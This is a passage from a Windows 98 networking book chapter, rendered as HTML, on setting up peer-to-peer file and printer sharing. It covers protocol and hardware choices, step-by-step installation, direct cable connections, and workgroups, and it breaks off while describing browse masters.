font-family:Symbol;} @list l5 {mso-list-id:974330086; mso-list-template-ids:-1518982766;} @list l5:level1 {mso-level-number-format:bullet; mso-level-text:; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Symbol;} @list l6 {mso-list-id:1018849125; mso-list-template-ids:-1043572948;} @list l6:level1 {mso-level-number-format:bullet; mso-level-text:; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Symbol;} @list l7 {mso-list-id:1155803727; mso-list-template-ids:-1013291478;} @list l7:level1 {mso-level-number-format:bullet; mso-level-text:; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Symbol;} @list l8 {mso-list-id:1898974691; mso-list-template-ids:-1159434048;} @list l8:level1 {mso-level-number-format:bullet; mso-level-text:; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Symbol;} ol {margin-bottom:0in;} ul {margin-bottom:0in;} --> </style><!--[if gte mso 10]> <style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ansi-language:#0400; mso-fareast-language:#0400; mso-bidi-language:#0400;} </style> <![endif]--> <p class="MsoNormal" style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">Windows 98 can serve as both a network client and as a network server (it's a floor wax and a dessert topping!). While you would never use the server capabilities of Windows 98 to host a large network on which you would instead use NetWare or Windows NT Server, the peer-to-peer networking capabilities in Windows 98 are sufficient for a number of uses, including:</span></i><span style="font-size: 10pt; font-family: Verdana;"><o:p></o:p></span></p> <ul type="disc"><li class="MsoNormal" style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">Sharing disk resources over a larger network</span></i><span style="font-size: 10pt; font-family: Verdana;"> <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">Sharing a CD-ROM drive with another computer that either doesn't have one, or that needs to share access to a single CD-ROM</span></i><span style="font-size: 10pt; font-family: Verdana;"> <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">Sharing printers over a larger network</span></i><span style="font-size: 10pt; font-family: Verdana;"> <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">Setting up a small office or home office (<st1:place st="on">SOHO</st1:place>) network</span></i><span style="font-size: 10pt; font-family: Verdana;"> <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">Allowing a backup system to access local resources for backup</span></i><span style="font-size: 10pt; font-family: Verdana;"> <o:p></o:p></span></li></ul> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">In this chapter, you learn about Windows 98 peer-to-peer networking capabilities: how to set them up, how to use them, and how to administer them. The information in this chapter can be used to fulfill any of the networking needs described in the preceding list.<o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <p class="MsoNormal" style="text-align: justify;"><strong><span style="font-size: 10pt; font-family: Verdana;">NOTE: </span></strong><span style="font-size: 10pt; font-family: Verdana;">For basic networking information, be sure to first read Chapter 21, "Understanding Windows 98 Networking." <o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <h2 style="text-align: justify;"><a name="Heading1"></a><span style="font-size: 10pt; font-family: Verdana;">Understanding Windows 98 Peer Networking Capabilities<o:p></o:p></span></h2> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">There are two main networking models in use: client-server and peer-to-peer. In a traditional client/server network, there is a dedicated server that has only the job of storing files for users (clients) in a central location, and also providing access to other network resources, such as printers and CD-ROM drives. In a peer-to-peer network, each computer is responsible for sharing files and printers with all of the other computers on the network.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Client/server networks, with a dedicated server, are best for larger groups of computers, particularly when there is someone with enough technical knowledge to manage the server and the network itself. Companies implement dedicated server networks when they grow to 10-25 computers, although there are exceptions (some smaller companies may implement a dedicated server if they have a specific need and if they have the technical know-how to manage one; other larger companies may maintain a peer network configuration up to as many as 50 computers). Smaller groups of computers are usually best served by a peer network.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Peer-to-peer networks have the following advantages and disadvantages:<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Advantages of peer networks:<o:p></o:p></span></p> <ul type="disc"><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Easier to set up <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Easier to maintain <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Much less expensive than dedicated server networks <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Spread the burden of providing services over many computers <o:p></o:p></span></li></ul> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Disadvantages of peer networks:<o:p></o:p></span></p> <ul type="disc"><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Less secure <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">More difficult to manage effectively <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Harder to back up all network resources <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Higher-end network applications may require a network operating system (such as NetWare or Windows NT Server) on which to run <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Clients that also provide services to others may perform more poorly <o:p></o:p></span></li></ul> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Windows 98 includes reliable peer networking capabilities that allow you to access resources on a Windows 98 system from other systems, be they other Windows 98 systems, Windows 95 systems, Windows NT systems, or even DOS systems. Using these capabilities, client computers can perform the following tasks:<o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <p class="MsoNormal" style="text-align: justify;"><strong><span style="font-size: 10pt; font-family: Verdana;">NOTE: </span></strong><span style="font-size: 10pt; font-family: Verdana;">Although you're learning about peer-to-peer networking, in any network transaction there is still always a server (the one with the resource) and a client (the one using the resource). In a peer network, all of the computers tend to be both clients and servers. <o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <span style="font-size: 10pt; font-family: Verdana;"> <ul type="disc"><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Browse all computers that are sharing resources <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Browse shared drives, folders, and files <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Open and work with shared files <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Map shared drives or folders to local drive letters <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Print to shared printers <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Remotely administer Windows 98 systems providing peer networking services <o:p></o:p></span></li></ul> </span> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">For a system to share its files and printers across a network, a number of things must be true:<o:p></o:p></span></p> <ul type="disc"><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Both the server and client must be running the same network client software: Client for Microsoft Networks or Client for NetWare Networks (both can be run if necessary). <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">The server must have the File and Printer Sharing service installed, either for NetWare or Microsoft networks (you can use only one or the other). <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Both the server and client must be using a compatible network protocol, such as NetBEUI, IPX/SPX, or TCP/IP. <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">A compatible physical network connection must be in place between the server and client. Examples include Ethernet, Token Ring, and Dial-Up Networking over either a modem or a direct-cable serial connection (this supports only peer resource sharing between two computers, and is much slower than the other choices). <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Selected resources on the server must be designated as being shared. <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">If user-level security is being used, the specified users must be created on the peer server, or taken from a NetWare server or a Windows NT system. <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">The server and client must have defined computer and workgroup names (although the workgroup name does not need to match). <o:p></o:p></span></li></ul> <h3 style="text-align: justify;"><a name="Heading2"></a><span style="font-size: 10pt; font-family: Verdana;">Choosing Microsoft or NetWare Peer Services and Protocols<o:p></o:p></span></h3> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Windows 98 can perform peer networking by using either the File and Printer Sharing service for NetWare or Microsoft networks. However, you can use only one of these peer networking services at a time. In other words, while you can run both clients simultaneously and access NetWare or Microsoft networks with them, you can perform peer networking using only one or the other services.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">You should choose the peer networking service based on the most-used client service you need to run. If you need to access NetWare servers, then use File and Printer Sharing for NetWare networks. Otherwise, using File and Printer Sharing for Microsoft networks is usually the best choice, whether or not you're also accessing Windows NT Servers.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">For small networks, the NetBEUI protocol is your best bet. The only drawback to NetBEUI is that it isn't routable, so if there's a router involved on your network (for example, in a larger corporate network), then TCP/IP will work better. If you're using the File and Printer Sharing service for NetWare networks, then you need to use the IPX/SPX protocol regardless.<o:p></o:p></span></p> <h3 style="text-align: justify;"><a name="Heading3"></a><span style="font-size: 10pt; font-family: Verdana;">Choosing Hardware for a Small Peer Network<o:p></o:p></span></h3> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">If you need to network just a few computers together (up to about eight), and don't need any of the advanced security or networking features offered by Windows NT Server or NetWare, then Windows 98 provides a good platform for building such a network. With Windows 98, you can easily share files and printers across a network, which is what is needed most of the time, anyway; most small networks can still be very productive without the features of NetWare or Windows NT Server.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">For setting up small home networks, or small office networks, it's best to go with some standard choices for these requirements, and it's easy and relatively inexpensive to do so. Consider the following items:<o:p></o:p></span></p> <ul type="disc"><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">You need to decide how you will wire the network (even if it's just wires snaked across a room). You'll need to know the location of each computer, and where you plan to locate the hub. <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">You should purchase a simple 10Base-T Ethernet hub (one with four to eight ports) that will cost about $150. You should choose a hub from a reputable manufacturer, such as <st1:country-region st="on"><st1:place st="on">Asante</st1:place></st1:country-region>, SMC, 3Com, or HP. While these companies make high-end hubs costing close to $1,000, they also offer small office hubs in the price range described. <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">For each computer, you will need a standard 10Base-T Ethernet card, costing between $60-$100. Again, stick with name brands for these cards. 3Com or SMC are both very good (and often can be ordered along with new computers, built into their motherboards) and there are many others, besides (the author and technical editor both prefer 3Com, by the way). <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">You will need an appropriate number of 10Base-T cables to run from each computer to the hub location. No cable can be longer than about 300 feet (100 meters). If you plan to occupy the space for more than a year or so, then it may make sense to bring in a network wiring professional to do a professional job and run the cables through the walls. <o:p></o:p></span></li></ul> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <p class="MsoNormal" style="text-align: justify;"><b><span style="font-size: 10pt; font-family: Verdana;">10Base-T or 10Base-2?</span></b><span style="font-size: 10pt; font-family: Verdana;"><o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <p class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">There are two forms of Ethernet that are widely used these days: 10Base-T (also called twisted-pair Ethernet) and 10Base-2 (also called thin Ethernet). 10Base-T Ethernet uses a star configuration with a hub to which all the computers connect. Its main advantage is that if the wiring from the hub to any computer is disconnected or broken, everything else keeps working. 10Base-2, on the other hand, uses a bus configuration where each computer is connected to the cable, one right after the other; if there's a break in the cable, the whole thing stops working. The main advantage to 10Base-2 is that it's often the cheapest way to connect several computers together that are in the same room, because there's no hub or extra wiring to have to purchase.
<br />Most companies are phasing out 10Base-2, but if you are setting up a small peer net-work, where all of the computers are close together, then you may want to consider it.
<br />If you decide to implement a 10Base-2 network, follow these rules:
<br />n The maximum length of the total network cable cannot exceed 185 meters, unless you extend it with a repeater every 185 meters (up to three segments, total, are allowed).
<br />n There should be no less than one meter of cable between each computer.
<br />n You must use RG/58 cable; mixing cable types can cause problems.
<br />n Each end of the cable must have a 50-ohm resistor connected, or the network won't operate.
<br />n You cannot connect more than 30 network devices to the network, unless you extend the network with either a repeater or router. <o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Once you have the hardware installed and connected, you can then set up each workstation so that it has the requisite software. The following section describes this process.<o:p></o:p></span></p> <h2 style="text-align: justify;"><a name="Heading4"></a><span style="font-size: 10pt; font-family: Verdana;">Setting Up Windows 98 for Peer Networks<o:p></o:p></span></h2> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">There are four components that must be installed into Windows 98 before you can try to connect to other computers over the network (and these steps must be carried out for each system, of course). Chapter 21 describes the Windows 98 network components in greater detail. This section gives you a quick look at how to set up peer-to-peer networking.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">First, you need to load the drivers for the network card that has been installed. For newer Plug and Play systems, this should have been easily accomplished when you started the system after installing the network interface card (NIC). If not, see Chapter 12, "Supporting Devices," for instructions on manually setting up the NIC driver.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Next, you need to install the network client software that you will use. As previously discussed, you have two choices: Client for Microsoft Networks and Client for NetWare Networks. If you need to connect to both peer resources and to a Windows NT Server, or if you will be doing only Windows 98 peer networking, then choose Client for Microsoft Networks. If you need to connect to a NetWare server, choose Client for NetWare Networks. To install either client, follow these steps:<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">1. Open the Network control panel. On the Configuration tab, click the <b><u>A</u></b>dd button. <o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">2. On the Select Network Component Type dialog box, choose Client and click OK (see Figure 22.1). <o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;"><a href="javascript:popUp('01.gif')">Figure 22.1</a><o:p></o:p></span></p> <p style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">Choosing a network component to install.</span></i><span style="font-size: 10pt; font-family: Verdana;"><o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">3. You now see the Select Network Client dialog box, shown in Figure 22.2. Choose Microsoft as the manufacturer, and then choose either Client for Microsoft Networks or Client for NetWare Networks (this example assumes Client for Microsoft Networks). After clicking OK, you may be prompted for your Windows 98 CD-ROM. <o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">4. After returning to the Network control panel's Configuration tab, click <b><u>A</u></b>dd again. This time, choose Protocol on the Select Network Component Type dialog box. <o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;"><a href="javascript:popUp('02.gif')">Figure 22.2</a><o:p></o:p></span></p> <p style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">Choosing a network client type.</span></i><span style="font-size: 10pt; font-family: Verdana;"><o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">5. In the Select Network Protocol dialog box (see Figure 22.3), choose Microsoft, and then choose NetBEUI, TCP/IP, or IPX/SPX-Compatible depending on whether you chose Microsoft or NetWare client in step 3. <o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;"><a href="javascript:popUp('03.gif')">Figure 22.3</a><o:p></o:p></span></p> <p style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">Choosing a network protocol.</span></i><span style="font-size: 10pt; font-family: Verdana;"><o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">6. Click <b><u>A</u></b>dd again on the Network control panel's Configuration dialog. This time, choose Service in the Select Network Component Type dialog box. <o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">7. In the Select Network Service dialog box (see Figure 22.4), choose either File and Printer Sharing for Microsoft Networks or File and Printer Sharing for NetWare Networks and click OK. <o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;"><a href="javascript:popUp('04.gif')">Figure 22.4</a><o:p></o:p></span></p> <p style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">Choosing a File and Printer Sharing service.</span></i><span style="font-size: 10pt; font-family: Verdana;"><o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">8. Back again on the Network control panel's Configuration tab, click the <b><u>F</u></b>ile and Print Sharing button, which shows you the File and Print Sharing dialog box shown in Figure 22.5. Enable either or both types of resource sharing and click OK. <o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;"><a href="javascript:popUp('05.gif')">Figure 22.5</a><o:p></o:p></span></p> <p style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">Enabling File and Print sharing.</span></i><span style="font-size: 10pt; font-family: Verdana;"><o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">9. Next, use the Identification tab of the Network control panel to designate a workgroup and computer name for the system. This is discussed in more detail in the next section. <o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">10. Click OK to close the Network control panel. You may be prompted again for your Windows 98 CD-ROM, and you will need to restart the computer when prompted to do so. <o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <p class="MsoNormal" style="text-align: justify;"><strong><span style="font-size: 10pt; font-family: Verdana;">TIP: </span></strong><span style="font-size: 10pt; font-family: Verdana;">At any time up until you click OK on the Network control panel's dialog box, you can cancel all changes with the Cancel button. <o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <h3 style="text-align: justify;"><a name="Heading5"></a><span style="font-size: 10pt; font-family: Verdana;">Direct Cable Peer Networking<o:p></o:p></span></h3> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">For simple, low-bandwidth connections between two computers, such as a connection between a laptop and a desktop PC, a network adapter card and network cabling is not necessary. Instead, you can network the computers directly by using a serial or parallel cable. Windows 98 provides two methods for setting up a direct cable networking connection, as follows:<o:p></o:p></span></p> <ul type="disc"><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">The Direct Cable Connection accessory (in the Accessories/Communication group) launches a wizard that sets up a direct-cable connection. <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">The Control Panel Modems application lets you configure a serial or parallel connection as a modem connection. You can access the other computer through this modem-cable connection by using Dial-Up Networking. <o:p></o:p></span></li></ul> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">The following sections discuss these alternatives.<o:p></o:p></span></p> <h4 style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Direct Cable Connection<o:p></o:p></span></h4> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">The Direct Cable Connection accessory sets up a direct serial or parallel connection between two PCs. Direct Cable Connection is in the Accessories/Communications group. If this applet is not present on your system, install it through the Add Programs Control Panel.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">A direct cable network connection is much like any other network connection--the two computers must use compatible protocols, and you can establish security using the user-level or share-level security models (as described in Chapter 21). To install a direct-cable network connection:<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">1. Double-click the Direct Cable Connection icon in the Accessories/Communications group to launch the Direct Cable Connection wizard (see Figure 22.6). <o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;"><a href="javascript:popUp('06.gif')">
<br />Figure 22.6</a><o:p></o:p></span></p> <p style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">The Direct Cable Connection Wizard.</span></i><span style="font-size: 10pt; font-family: Verdana;"><o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">2. The wizard will ask if you want the computer to act as a <i>guest</i> (to access shared files on another PC) or a <i>host</i> (refer to Figure 22.6). The host option lets the PC act as either a host or a guest--you can either share files or access shared files on another computer. If a host PC is connected to a network, the guest can reach the network through the host. Click Next. <o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">3. Choose which port you'd like to use for the direct cable connection (see Figure 22.7). Plug the cable into the port. Click Next. <o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;"><a href="javascript:popUp('07.gif')">Figure 22.7</a><o:p></o:p></span></p> <p style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">Choose a port and cable type in the Direct Cable Connection wizard.</span></i><span style="font-size: 10pt; font-family: Verdana;"><o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">4. If you are configuring the computer as a host, and the computer isn't currently configured with shared resources, the wizard will prompt you to create some shared folders that the guest can access (see Figure 22.8). Follow the instructions and click Next. <o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;"><a href="javascript:popUp('08.gif')">Figure 22.8</a><o:p></o:p></span></p> <p style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">The Direct Cable Connection wizard prompts you to share folders on the host.</span></i><span style="font-size: 10pt; font-family: Verdana;"><o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">5. The wizard instructs you to plug the cable into both computers (if you haven't done so already) and to run the Direct Cable Connection wizard on the other PC. You are offered the option of setting password protection for the host PC. Check the Use Password Protection box to set up password protection, and click on Set Password to enter a password for the host. <o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 0.5in; text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">6. Click Finish. <o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">The direct cable connection can act as a NetBIOS gateway to a TCP/IP network. If you plan to use the host as a gateway to a TCP/IP network, use NetBEUI for the direct cable connection.<o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <p class="MsoNormal" style="text-align: justify;"><strong><span style="font-size: 10pt; font-family: Verdana;">NOTE: </span></strong><span style="font-size: 10pt; font-family: Verdana;">You cannot use Direct Cable Connection and Dial-Up Networking at the same time. Shut down all Dial-Up Networking connections before you attempt to use Direct Cable Connection. <o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <h4 style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Direct Connection Through Dial-Up Networking<o:p></o:p></span></h4> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">You can also connect two PCs through a serial or parallel connection by using Dial-Up Networking (DUN). See Chapter 26 for a complete description of Windows 98's Dial-Up Networking feature. Once you set this up, you "dial" the other computer--just as you do with a remote Internet connection--over a modem cable. The Direct Cable "modem" is configured the same way as a real modem, with a bound network protocol, such as TCP/IP, on each end.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">When you open the Modems control panel and choose to add a new modem, and then choose to manually select one from a list, you can choose (Standard Modem Types) in the Manufacturer list, and then either Dial-Up Networking Serial Cable Between 2 PCs or Dial-Up Networking Parallel Cable Between 2 PCs.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Once the modem cable is installed, set up a Dial-Up Networking connection through the modem (see Chapter 26).<o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <p class="MsoNormal" style="text-align: justify;"><strong><span style="font-size: 10pt; font-family: Verdana;">NOTE: </span></strong><span style="font-size: 10pt; font-family: Verdana;">You can purchase the special cables required to connect two computers by using DUN from most computer stores. If you are setting up a serial connection, you purchase a null-modem cable that has a female RS-232C connector (9- or 25-pin, as appropriate for the computers) on each end. If you are setting up a parallel connection, ask for a parallel-to-parallel cable, such as the one used by LapLink or other direct-connect programs (it should have a male DB25 connector on each end, with all wires supported). <o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <h3 style="text-align: justify;"><a name="Heading6"></a><span style="font-size: 10pt; font-family: Verdana;">Understanding Workgroups and Identification<o:p></o:p></span></h3> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">For peer networking, Windows 98 supports a Workgroup model that lets you divide up the resources (computers) on the peer network into groupings of computers. These groups do not have any function other than to help users browse the computers available and more easily find the one that they're looking for. Workgroups do not deny access to users in different workgroups, nor do they have to be created and maintained. All that must be done is to identify each computer as being in a particular workgroup.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">For example, in a larger organization using peer networking, you might create workgroups for each department: one for finance, operations, marketing, sales, and so forth. When a user goes to locate a particular computer, they can more easily find it by opening one of the workgroups shown inside Network Neighborhood.<o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <p class="MsoNormal" style="text-align: justify;"><b><span style="font-size: 10pt; font-family: Verdana;">File and Printer Sharing for Microsoft Networks: Browse Masters</span></b><span style="font-size: 10pt; font-family: Verdana;"><o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <p class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">If you use File and Printer Sharing for Microsoft Networks, the peer network uses some of the computers within each workgroup as master browse servers, or browse masters. These computers, which are "elected" from among all the computers in the workgroup, maintain the list of all computers and resources within the workgroup. Depending on the number of computers in the workgroup, there may be more than one Browse Master, and there may also be Backup Browse Masters. Generally, there is one Browse Master for each 15 computers in a workgroup. There will also be at least one Browse Master for each protocol used in each workgroup, so if you are using both NetBEUI and TCP/IP, there will be at least two Browse Masters, one per protocol.
